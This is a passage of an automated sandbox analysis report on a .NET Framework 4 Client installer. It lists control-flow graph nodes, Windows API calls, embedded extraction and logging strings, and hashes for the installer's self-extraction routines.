18482->18497 18505 2e55a 18482->18505 18483->18477 18486 2e158 18483->18486 18484->18509 18485 2e6e4 18485->18488 18491 2b059 __fclose_nolock 66 API calls 18485->18491 18486->18477 18487 2e168 GetConsoleCP 18486->18487 18487->18509 18511 2e18b 18487->18511 18488->18461 18489 2e422 WriteFile 18489->18484 18489->18490 18490->18485 18490->18489 18490->18509 18493 2e707 18491->18493 18492 2e6b7 18495 2e6c2 18492->18495 18496 2e6d6 18492->18496 18499 2b071 __close 66 API calls 18493->18499 18494 2e5cb WideCharToMultiByte 18494->18484 18501 2e602 WriteFile 18494->18501 18500 2b059 __fclose_nolock 66 API calls 18495->18500 18535 2b089 18496->18535 18497->18485 18498 2e4fc WriteFile 18497->18498 18497->18509 18498->18484 18498->18497 18499->18488 18503 2e6c7 18500->18503 18504 2e639 GetLastError 18501->18504 18501->18505 18507 2b071 __close 66 API calls 18503->18507 18504->18505 18505->18485 18505->18494 18505->18501 18505->18509 18507->18488 18508 2f7d3 78 API calls __fassign 18508->18511 18509->18485 18509->18488 18509->18492 18510 31b19 WriteConsoleW CreateFileW __write_nolock 18510->18511 18511->18484 18511->18508 18511->18509 18511->18510 18512 2e237 WideCharToMultiByte 18511->18512 18514 2e2bc WriteFile 18511->18514 18532 2f82f 18511->18532 18512->18509 18513 2e268 WriteFile 18512->18513 18513->18484 18513->18511 18514->18484 18514->18511 18556 31aed LeaveCriticalSection 18515->18556 18517 2e80c 18517->18412 18521 2d0da LeaveCriticalSection 18518->18521 18520 31ae6 18520->18448 18521->18520 18540 319db 18522->18540 18524 2dedd 18525 2def6 SetFilePointer 18524->18525 18526 2dee5 18524->18526 18528 2deea 18525->18528 18529 2df0e GetLastError 18525->18529 18527 2b059 __fclose_nolock 66 API calls 18526->18527 18527->18528 18528->18467 18529->18528 18530 2df18 18529->18530 18531 2b089 __dosmaperr 66 API calls 18530->18531 18531->18528 18553 2f7f2 18532->18553 18536 2b071 __close 66 API calls 18535->18536 18537 2b094 _free 18536->18537 18541 31a00 18540->18541 18542 319e8 
18540->18542 18544 2b071 __close 66 API calls 18541->18544 18548 31a3f 18541->18548 18543 2b071 __close 66 API calls 18542->18543 18545 319ed 18543->18545 18547 31a11 18544->18547 18546 2b059 __fclose_nolock 66 API calls 18545->18546 18549 319f5 18546->18549 18550 2b059 __fclose_nolock 66 API calls 18547->18550 18548->18524 18549->18524 18551 31a19 18550->18551 18552 2affd __fclose_nolock 11 API calls 18551->18552 18552->18549 18554 292e9 _LocaleUpdate::_LocaleUpdate 76 API calls 18553->18554 18556->18517 18560 31aed LeaveCriticalSection 18557->18560 18559 2e031 18559->18436 18560->18559 18561->16631 18563 18cb2 18562->18563 18564 18cac 18562->18564 18566 18ce9 18563->18566 18580 19a43 GetProcessHeap HeapSize 18563->18580 18579 19a43 GetProcessHeap HeapSize 18564->18579 18568 18cee 18566->18568 18576 18d08 18566->18576 18581 18836 18568->18581 18569 18ccc 18571 18577 18569->18571 18572 18cde lstrlenA 18569->18572 18571->16639 18571->16645 18572->18566 18574 18cfe 18574->18571 18575 18d94 18574->18575 18574->18576 18577 18836 4 API calls 18574->18577 18575->18571 18578 18e6f 3 API calls 18575->18578 18576->18574 18576->18575 18586 33517 18576->18586 18577->18574 18578->18571 18579->18563 18580->18569 18582 18870 18581->18582 18583 18847 18581->18583 18582->18574 18584 18861 GetProcessHeap HeapAlloc 18583->18584 18585 18850 GetProcessHeap HeapReAlloc 18583->18585 18584->18582 18585->18582 18589 33466 18586->18589 18590 33482 18589->18590 18591 33497 18589->18591 18593 2b059 __fclose_nolock 66 API calls 18590->18593 18592 334bb 18591->18592 18594 334a6 18591->18594 18604 2eaec 18592->18604 18595 33487 18593->18595 18596 2b059 __fclose_nolock 66 API calls 18594->18596 18598 2affd __fclose_nolock 11 API calls 18595->18598 18599 334ab 18596->18599 18602 33492 18598->18602 18601 2affd __fclose_nolock 11 API calls 18599->18601 18600 334e9 18600->18602 18603 2b0db __flsbuf 97 API calls 18600->18603 18601->18602 18602->18576 18603->18602 18605 292e9 
_LocaleUpdate::_LocaleUpdate 76 API calls 18604->18605 18606 2eb53 18605->18606 18607 2eb57 18606->18607 18609 2e8bc __fclose_nolock 66 API calls 18606->18609 18620 2eb8e __aulldvrm __woutput_l _strlen 18606->18620 18608 2b059 __fclose_nolock 66 API calls 18607->18608 18610 2eb5c 18608->18610 18609->18620 18611 2affd __fclose_nolock 11 API calls 18610->18611 18612 2eb67 18611->18612 18613 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18612->18613 18614 2f673 18613->18614 18614->18600 18615 2f7f2 __isleadbyte_l 76 API calls 18615->18620 18616 31e55 97 API calls _write_string 18616->18620 18617 2c318 _free 66 API calls 18617->18620 18618 2eef4 18619 2f1e3 _DecodePointerInternal 18618->18619 18622 2dbda __malloc_crt 66 API calls 18618->18622 18624 2ef31 18618->18624 18621 2f232 18619->18621 18620->18607 18620->18612 18620->18615 18620->18616 18620->18617 18620->18618 18628 2ea73 97 API calls _write_string 18620->18628 18629 31e33 78 API calls __cftof 18620->18629 18623 2f25e 18621->18623 18625 2f24c _DecodePointerInternal 18621->18625 18622->18624 18626 2f27f 18623->18626 18627 2f26d _DecodePointerInternal 18623->18627 18624->18619 18625->18623 18626->18600 18627->18626 18628->18620 18629->18620 18631 19926 10 API calls 18630->18631 18632 19c39 18631->18632 18633 19c42 DeleteFileW 18632->18633 18640 19c76 18632->18640 18634 19c4d GetLastError 18633->18634 18633->18640 18636 19c5a 18634->18636 18634->18640 18635 19c95 18635->16674 18638 19c5f MoveFileExW 18636->18638 18636->18640 18637 18e6f 3 API calls 18637->18635 18639 19c6e GetLastError 18638->18639 18638->18640 18639->18640 18640->18635 18640->18637 18642 19926 10 API calls 18641->18642 18643 192e9 18642->18643 18644 1952f 18643->18644 18645 192f8 GetFileAttributesW 18643->18645 18646 19550 FindClose 18644->18646 18647 1955c 18644->18647 18648 19325 18645->18648 18649 19319 GetLastError 18645->18649 18646->18647 18650 19570 18647->18650 18651 18e6f 3 API calls 18647->18651 
18648->18644 18653 1958e 18648->18653 18654 19366 18648->18654 18655 19349 SetFileAttributesW 18648->18655 18649->18648 18652 19574 RemoveDirectoryW 18650->18652 18650->18653 18651->18650 18652->18653 18656 19584 GetLastError 18652->18656 18657 195ab 18653->18657 18660 18e6f 3 API calls 18653->18660 18654->18652 18654->18653 18659 18889 7 API calls 18654->18659 18655->18654 18658 1935a GetLastError 18655->18658 18656->18653 18661 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 18657->18661 18658->18654 18662 19399 18659->18662 18660->18657 18663 195ba 18661->18663 18662->18647 18664 18abb 6 API calls 18662->18664 18663->16672 18665 193b5 18664->18665 18665->18647 18666 193bf FindFirstFileW 18665->18666 18667 193dd GetLastError 18666->18667 18676 193e9 18666->18676 18667->18676 18668 18889 7 API calls 18668->18676 18669 19509 FindNextFileW 18670 19524 GetLastError 18669->18670 18669->18676 18670->18644 18671 18abb 6 API calls 18671->18676 18672 194e1 DeleteFileW 18672->18669 18675 194f1 GetLastError 18672->18675 18673 194b8 SetFileAttributesW 18673->18672 18674 194c9 GetLastError 18673->18674 18674->18676 18675->18676 18676->18644 18676->18647 18676->18668 18676->18669 18676->18671 18676->18672 18676->18673 18677 192bb 15 API calls 18676->18677 18677->18676 18679 18dc6 18678->18679 18680 18dcb FormatMessageW 18678->18680 18679->18680 18681 18e12 18680->18681 18682 18def GetLastError 18680->18682 18684 18889 7 API calls 18681->18684 18683 18dfb 18682->18683 18685 18e24 LocalFree 18683->18685 18686 15d40 18683->18686 18684->18683 18685->18686 18686->16706 18686->16707 18707 33923 18687->18707 18689 18518 18690 1848d 18689->18690 18691 1849b 18690->18691 18692 184c0 18691->18692 18693 1870c 117 API calls 18691->18693 18694 1870c 18692->18694 18693->18692 18695 18c9a 112 API calls 18694->18695 18696 1872e 18695->18696 18697 18735 lstrlenA 18696->18697 18706 1879a 18696->18706 18699 18770 18697->18699 18700 1874b WriteFile 18697->18700 18698 
18535 18698->16722 18703 18775 WriteFile 18699->18703 18699->18706 18701 18768 18700->18701 18702 187be GetLastError 18700->18702 18701->18699 18701->18700 18702->18706 18705 1878d GetLastError 18703->18705 18703->18706 18704 18e6f 3 API calls 18704->18698 18705->18706 18706->18698 18706->18704 18708 33943 18707->18708 18709 3392e 18707->18709 18710 33951 18708->18710 18713 3395e 18708->18713 18711 2b059 __fclose_nolock 66 API calls 18709->18711 18714 2b059 __fclose_nolock 66 API calls 18710->18714 18712 33933 18711->18712 18715 2affd __fclose_nolock 11 API calls 18712->18715 18723 33854 18713->18723 18722 33956 18714->18722 18717 3393e 18715->18717 18717->18689 18718 2affd __fclose_nolock 11 API calls 18720 33994 18718->18720 18720->18689 18721 2b059 __fclose_nolock 66 API calls 18721->18722 18722->18718 18724 33872 18723->18724 18725 3388a 18723->18725 18726 2b059 __fclose_nolock 66 API calls 18724->18726 18727 33899 18725->18727 18733 338ae 18725->18733 18728 33877 18726->18728 18729 2b059 __fclose_nolock 66 API calls 18727->18729 18730 2affd __fclose_nolock 11 API calls 18728->18730 18731 3389e 18729->18731 18734 33882 18730->18734 18732 2affd __fclose_nolock 11 API calls 18731->18732 18732->18734 18733->18734 18735 2b0db __flsbuf 97 API calls 18733->18735 18734->18720 18734->18721 18735->18734 18739 29927 18736->18739 18738 29a98 18740 29933 _raise 18739->18740 18741 2d1bd __lock 61 API calls 18740->18741 18742 2993a 18741->18742 18744 29965 _DecodePointerInternal 18742->18744 18747 299e4 18742->18747 18746 2997c _DecodePointerInternal 18744->18746 18744->18747 18753 2998f 18746->18753 18762 29a52 18747->18762 18749 29a61 _raise 18749->18738 18750 29a49 18752 297f1 __mtinitlocknum 3 API calls 18750->18752 18754 29a52 18752->18754 18753->18747 18755 299a6 _DecodePointerInternal 18753->18755 18759 299b5 _DecodePointerInternal _DecodePointerInternal 18753->18759 18760 2a539 _EncodePointerInternal 18753->18760 18756 29a5f 18754->18756 18767 2d0da 
LeaveCriticalSection 18754->18767 18761 2a539 _EncodePointerInternal 18755->18761 18756->18738 18759->18753 18760->18753 18761->18753 18763 29a58 18762->18763 18765 29a32 18762->18765 18768 2d0da LeaveCriticalSection 18763->18768 18765->18749 18766 2d0da LeaveCriticalSection 18765->18766 18766->18750 18767->18756 18768->18765 18769 16a56 18770 16b1d 18769->18770 18771 16a6f 18769->18771 18772 16b76 GetDlgItem 18770->18772 18774 16b29 18770->18774 18771->18772 18773 16a75 18771->18773 18775 16b6e SendMessageW 18772->18775 18776 16b88 GetLastError 18772->18776 18777 16b14 PostQuitMessage 18773->18777 18778 16a7f 18773->18778 18779 16abb 18774->18779 18780 16b34 GetDlgItem 18774->18780 18775->18779 18788 16b52 18776->18788 18777->18779 18782 16af0 18778->18782 18783 16a84 18778->18783 18780->18775 18784 16b46 GetLastError 18780->18784 18799 16be1 EnterCriticalSection 18782->18799 18786 16ac3 18783->18786 18787 16a8b 18783->18787 18784->18788 18789 16adc SetEvent 18786->18789 18792 16ad4 SetWindowTextW 18786->18792 18787->18779 18795 16be1 12 API calls 18787->18795 18791 1854a 118 API calls 18788->18791 18789->18779 18794 16bb4 18791->18794 18792->18789 18793 16b08 KiUserCallbackDispatcher 18793->18779 18794->18779 18796 16bba EndDialog 18794->18796 18797 16aa6 18795->18797 18796->18779 18797->18779 18798 16aae SendMessageA 18797->18798 18798->18779 18800 16c01 18799->18800 18801 16c3d LeaveCriticalSection 18799->18801 18800->18801 18804 19166 6 API calls 18800->18804 18802 16af8 18801->18802 18803 16c4b 18801->18803 18802->18779 18802->18793 18805 18e6f 3 API calls 18803->18805 18806 16c1a MessageBoxW 18804->18806 18805->18802 18806->18801 18807 16c33 18806->18807 18807->18801

                                                                                                                                                                    Control-flow Graph (function starting at block 1774a-17782; the rendered graph, its Executed / Not Executed legend and the raw node-edge listing are not reproduced here)
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetLogicalDriveStringsW.KERNELBASE(0000009C,?,00000000,00000000,X?f,?,?,00016F09,?,?,00000000,?,?,00015B53,?,?), ref: 000177E5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00016F09,?,?,00000000,?,?,00015B53,?,?,?,?,?,X?f), ref: 000177EE
                                                                                                                                                                    Strings
                                                                                                                                                                    • Drive '%S' has been selected as the largest removable drive, xrefs: 000179BA
                                                                                                                                                                    • Unable to allocate a string for extracion drive, xrefs: 000179A4
                                                                                                                                                                    • Failed to dtermine whether a drive can be written to, xrefs: 00017966
                                                                                                                                                                    • Failed to get logical drives, xrefs: 0001780F
                                                                                                                                                                    • Drive '%S' is rejected because it can't be written to, xrefs: 000178C7
                                                                                                                                                                    • X?f, xrefs: 00017755
                                                                                                                                                                    • Failed to allocate memory for logical drives, xrefs: 000177CC
                                                                                                                                                                    • Unable to get the drive type, xrefs: 0001795F
                                                                                                                                                                    • Drive '%S' is rejected because it's a resource of a cluster, xrefs: 0001786B
                                                                                                                                                                    • Insufficient size on any available drives, xrefs: 000179CE
                                                                                                                                                                    • Cluster drive map: '%S', xrefs: 000177AA
                                                                                                                                                                    • Considering drive: '%S'..., xrefs: 00017849
                                                                                                                                                                    • Drive '%S' is rejected because it's not a hard disk or RAM disk, xrefs: 000178AB
                                                                                                                                                                    • Drive '%S' has been selected as the largest fixed drive, xrefs: 00017982
                                                                                                                                                                    • Unable to allocate the cluster drive map, xrefs: 00017795
                                                                                                                                                                    • Drive '%S' is rejected because of the unknown or unsuitable drive type, xrefs: 00017898
                                                                                                                                                                    • Failed to find any drive to extract to, xrefs: 00017958
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocDriveErrorLastLogicalProcessStrings
                                                                                                                                                                    • String ID: Cluster drive map: '%S'$Considering drive: '%S'...$Drive '%S' has been selected as the largest fixed drive$Drive '%S' has been selected as the largest removable drive$Drive '%S' is rejected because it can't be written to$Drive '%S' is rejected because it's a resource of a cluster$Drive '%S' is rejected because it's not a hard disk or RAM disk$Drive '%S' is rejected because of the unknown or unsuitable drive type$Failed to allocate memory for logical drives$Failed to dtermine whether a drive can be written to$Failed to find any drive to extract to$Failed to get logical drives$Insufficient size on any available drives$Unable to allocate a string for extracion drive$Unable to allocate the cluster drive map$Unable to get the drive type$X?f
                                                                                                                                                                    • API String ID: 3325457267-4183805676
                                                                                                                                                                    • Opcode ID: a266fab7baba1c7c36e1cb4a94ace23acb950bbf03821c4c0317d903aacecd1f
                                                                                                                                                                    • Instruction ID: ea6d5c5ac43819c31067588e8d76e075bdb084180df4a7d946d53a5a1ba2a15c
                                                                                                                                                                    • Opcode Fuzzy Hash: a266fab7baba1c7c36e1cb4a94ace23acb950bbf03821c4c0317d903aacecd1f
                                                                                                                                                                    • Instruction Fuzzy Hash: 5381B331D48215ABCF21AF94D881AEEB7F6BF44710F21402AE50DB7151EB719AC5CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Control-flow Graph (function starting at block 159a6-159fc; the rendered graph, its Executed / Not Executed legend and the raw node-edge listing are not reproduced here)
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 000159E3
  • Part of subcall function 00016C5C: GetCommandLineW.KERNEL32(?,00000000,X?f), ref: 00016C76
  • Part of subcall function 00016C5C: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00016C84
  • Part of subcall function 00016C5C: GetLastError.KERNEL32 ref: 00016C91
• _wcsrchr.LIBCMT ref: 00015A1C
• _memset.LIBCMT ref: 00015A37
• PathRemoveExtensionW.SHLWAPI(?), ref: 00015A58
• _memset.LIBCMT ref: 00015A72
• GetEnvironmentVariableW.KERNEL32(temp,?,00000104), ref: 00015A88
• swprintf.LIBCMT ref: 00015AA3
  • Part of subcall function 00016463: GetProcessHeap.KERNEL32(00000000,00000000,74DF23A0,?,00015BF4), ref: 000164A0
  • Part of subcall function 00016463: HeapFree.KERNEL32(00000000,?,00015BF4), ref: 000164A7
• CloseHandle.KERNEL32(000001D0), ref: 00015C5E
  • Part of subcall function 00018E6F: GetProcessHeap.KERNEL32(00000000,?,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E79
  • Part of subcall function 00018E6F: HeapFree.KERNEL32(00000000,?,000185A8,00000000,00000000,?,?,00016A49,00000000,Failed while running the progress dialog.), ref: 00018E80
Strings
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$CommandFreeHandleLineProcess_memset$ArgvCloseEnvironmentErrorExtensionLastModulePathRemoveVariable_wcsrchrswprintf
• String ID: === Logging stopped: %S ===$Exiting with result code: 0x%x$Failed to allocate log$Failed to execute file$Failed to extract$Failed to initialize arguments$Failed to open the box$Failed to select and/or prepare the directory for extraction$Unable to estimate the required size$X?f$\dd_%s_decompression_log.txt$temp
• API String ID: 4209647820-3904233393
• Opcode ID: d0d7af7843404f762197a7aa38e70e410f9e70d15105335d0117e9f2172ef730
• Instruction ID: a254cab9ada6639f27b9b635d032c1583735c3dcfd9c80c4794463e1c55e16ee
• Opcode Fuzzy Hash: d0d7af7843404f762197a7aa38e70e410f9e70d15105335d0117e9f2172ef730
• Instruction Fuzzy Hash: 5A812272508741EFD722EF64DC86EEA73E9ABC4701F000929F254DB192DB75D9C48B92
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 399 1621f-1624f GetProcessHeap HeapAlloc 400 16251-1625b 399->400 401 16260-16268 399->401 402 163ed-163f4 call 1854a 400->402 403 162fd-16305 401->403 404 1626e 401->404 415 163f5 call 168fb 402->415 406 16353-1635e call 1676f 403->406 407 16307-1632e GetProcessHeap HeapAlloc 403->407 405 16271-1627a call 19dc6 404->405 414 1627f-16283 405->414 416 16360-16365 406->416 417 1636a-16389 call 184c7 call 169b0 406->417 407->406 410 16330-1633a 407->410 410->402 418 16289-1629a call 19ef3 414->418 419 1633f-16344 414->419 421 163fa-163ff 415->421 416->402 441 163d8-163e6 call 169b0 call 169e3 417->441 442 1638b-16394 call 169e3 417->442 431 162a0-162a4 418->431 432 16349-1634e 418->432 419->402 424 16401-16407 421->424 425 1643c-16442 421->425 428 16421-16435 GetProcessHeap HeapFree 424->428 429 16409-16411 424->429 428->425 438 16437 call 19a29 428->438 435 16413 call 1a46e 429->435 436 16418-1641f 429->436 433 162a6-162ac 431->433 434 162ae-162b9 431->434 432->402 439 162bb-162c0 433->439 434->439 435->436 436->428 436->429 438->425 444 162c2-162c5 439->444 445 162e7-162f7 439->445 441->421 455 163e8 441->455 454 16396-16399 442->454 442->455 448 162c8-162cc 444->448 445->403 445->405 451 162d3-162df 448->451 452 162ce-162d1 448->452 456 162e1-162e5 451->456 452->456 458 163b0-163b9 call 169e3 454->458 459 1639b-163aa call 1a003 454->459 455->402 456->445 456->448 458->455 464 163bb-163c7 call 1a222 458->464 459->458 465 16445-1644b 459->465 468 163cc-163d0 464->468 467 16453-1645c call 1854a 465->467 467->415 470 163d2-163d6 468->470 471 1644d-1644e 468->471 470->441 470->442 471->467
APIs
• GetProcessHeap.KERNEL32(00000008,?,00000000,74DF23A0,00000000,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001623D
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016244
• GetProcessHeap.KERNEL32(00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001631A
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016321
• GetProcessHeap.KERNEL32(00000000,?,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016426
• HeapFree.KERNEL32(00000000,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001642D
Strings
• Failed to extract all files out of box container #%d., xrefs: 0001644E
• Failed to start reporting progress, xrefs: 00016360
• User canceled extraction..., xrefs: 000163E8
• Failed to allocate memory to hold container handles., xrefs: 00016256
• Extracting files to: %S, xrefs: 0001636D
• Failed to open container., xrefs: 0001633F
• Failed to alloc cleanup list buffer, xrefs: 00016335
• Failed to read container header., xrefs: 00016349
• Failed to verify box container #%d., xrefs: 00016446
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free
• String ID: Extracting files to: %S$Failed to alloc cleanup list buffer$Failed to allocate memory to hold container handles.$Failed to extract all files out of box container #%d.$Failed to open container.$Failed to read container header.$Failed to start reporting progress$Failed to verify box container #%d.$User canceled extraction...
• API String ID: 1864747095-3704756192
• Opcode ID: 40eddf589476ecd3fecaf425de5638178d0c40e28d40ec5b4fd2e31b69c72c4f
• Instruction ID: 386b44b61681ad396e3acba269ff004272dd2d013e504b1519300cf742e22d1f
• Opcode Fuzzy Hash: 40eddf589476ecd3fecaf425de5638178d0c40e28d40ec5b4fd2e31b69c72c4f
• Instruction Fuzzy Hash: 16619332D00626ABDB219F98CC85AEEB7B4FF44710F154165FA11AB252DB72DEC0C7A1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 504 1751d-17560 CryptAcquireContextA 505 17562-1756c GetLastError 504->505 506 1758d-1759e CryptGenRandom 504->506 509 1757c 505->509 510 1756e-1757a 505->510 507 175a0-175aa GetLastError 506->507 508 175cb-175df 506->508 511 175ba 507->511 512 175ac-175b8 507->512 513 175e1-17606 call 18b7e 508->513 514 17657-1765c 508->514 515 17583-17588 509->515 516 1757e 509->516 510->509 518 175c1-175c6 511->518 519 175bc 511->519 512->511 528 17643-17648 513->528 529 17608-1760b 513->529 521 17668-1766b 514->521 522 1765e-17662 CryptReleaseContext 514->522 517 1764f-17656 call 1854a 515->517 516->515 517->514 518->517 519->518 525 17675-17685 call 291d5 521->525 526 1766d-17670 call 18e6f 521->526 522->521 526->525 528->517 533 17614-17624 call 18abb 529->533 534 1760d-17612 529->534 539 17626-1762a 533->539 540 1764a 533->540 535 17634-1763f 534->535 535->513 537 17641 535->537 537->514 539->535 541 1762c-1762f call 18e6f 539->541 540->517 541->535
APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,X?f,?,?,?,?,?,X?f), ref: 00017558
• GetLastError.KERNEL32 ref: 00017562
• CryptGenRandom.ADVAPI32(?,00000010,?), ref: 00017596
• GetLastError.KERNEL32 ref: 000175A0
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 00017662
Strings
• Failed to generate a random value, xrefs: 000175C1
• X?f, xrefs: 00017532
• %02x, xrefs: 000175F4
• Failed to allocate formatted current byte for the random string, xrefs: 00017643
• Failed to concatenate the formatted byte to the random string, xrefs: 0001764A
• Failed to acquire Crypto context, xrefs: 00017583
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
• Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
Similarity
• API ID: Crypt$ContextErrorLast$AcquireRandomRelease
• String ID: %02x$Failed to acquire Crypto context$Failed to allocate formatted current byte for the random string$Failed to concatenate the formatted byte to the random string$Failed to generate a random value$X?f
• API String ID: 236824231-2443091033
• Opcode ID: 96d39745c9bb4000323314d7b3ee01d3254e479b79b99c0fef67b24b68f80861
• Instruction ID: ae369d87006d9a854760aff15cb14178b6aa2feb50fdeb705dcfe9feeae9dd0c
• Opcode Fuzzy Hash: 96d39745c9bb4000323314d7b3ee01d3254e479b79b99c0fef67b24b68f80861
• Instruction Fuzzy Hash: 8A411972D0861AAFDB219BA8CC05BFEFBF5AF18340F154026E905B7191D7B84E80CB95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 543 17c12-17c1e 544 17c20-17c2d LoadLibraryW 543->544 545 17c8c-17c99 DecryptFileW 543->545 548 17c53-17c66 GetProcAddress 544->548 549 17c2f-17c37 GetLastError 544->549 546 17cc5-17cc8 545->546 547 17c9b-17ca3 GetLastError 545->547 553 17cb1 547->553 554 17ca5-17caf 547->554 548->545 552 17c68-17c70 GetLastError 548->552 550 17c45 549->550 551 17c39-17c43 549->551 555 17c47 550->555 556 17c4c-17c51 550->556 551->550 557 17c72-17c7c 552->557 558 17c7e 552->558 559 17cb3 553->559 560 17cb8 553->560 554->553 555->556 561 17cbd-17cc4 call 1854a 556->561 557->558 562 17c80 558->562 563 17c85-17c8a 558->563 559->560 560->561 561->546 562->563 563->561
APIs
• LoadLibraryW.KERNEL32(advapi32.dll,?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?), ref: 00017C25
• GetLastError.KERNEL32(?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 00017C2F
• GetProcAddress.KERNEL32(00000000,DecryptFileW), ref: 00017C59
• GetLastError.KERNEL32(?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 00017C68
• DecryptFileW.ADVAPI32(?,00000000), ref: 00017C91
• GetLastError.KERNEL32(?,00016F3D,?,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 00017C9B
Strings
• Failed to load DecryptFileW from advapi.dll, xrefs: 00017C85
• DecryptFileW, xrefs: 00017C53
• advapi32.dll, xrefs: 00017C20
• Failed to load advapi32.dll, xrefs: 00017C4C
• Failed to decrypt the extract directory, xrefs: 00017CB8
Memory Dump Source
• Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$AddressDecryptFileLibraryLoadProc
                                                                                                                                                                    • String ID: DecryptFileW$Failed to decrypt the extract directory$Failed to load DecryptFileW from advapi.dll$Failed to load advapi32.dll$advapi32.dll
                                                                                                                                                                    • API String ID: 156776402-3428403797
                                                                                                                                                                    • Opcode ID: 15edc2da5a99a366a1b840b7d24b4557f359ebc6fad2660161e5426f66516693
                                                                                                                                                                    • Instruction ID: a74ad02cb0c8e98d2a12842606b58fe897826fe5f3a46dc3251d7b8db2a232c3
